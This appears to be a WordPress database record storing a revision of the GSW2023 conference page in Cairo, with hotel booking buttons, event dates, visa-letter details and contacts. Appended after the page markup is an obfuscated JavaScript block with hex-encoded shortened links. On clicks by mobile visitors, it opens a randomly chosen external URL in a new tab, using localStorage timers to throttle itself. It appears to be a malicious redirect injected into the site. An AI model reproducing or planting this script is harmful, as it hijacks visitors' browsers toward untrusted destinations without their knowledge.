!important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-26 20:39:10','2023-08-26 20:39:10','',3066,'https://gsw2023.com/?p=5416',0,'revision','',0),
